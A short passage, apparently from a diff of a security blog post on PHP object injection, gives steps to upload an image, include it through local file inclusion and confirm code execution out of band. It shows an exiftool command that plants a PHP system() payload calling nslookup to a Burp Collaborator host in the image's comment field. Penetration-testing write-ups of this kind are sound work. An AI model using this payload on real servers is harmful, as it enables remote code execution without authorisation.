InfoSecAntara/theantaramane/_posts/2021-05-08-PHPObjectInjection.md

   2. Upoad the file and locate the path
   3. Utilize LFI include image file and make an Out of Band call to confirm the code execution

+We will be using exif tool with the following command:

+"exiftool -Comment='<?php system("nslookup 4lqd7k2ulofzkiwzv0m5gf7qohu8ix.burpcollaborator.net"); ?>' beingsecure.jpeg"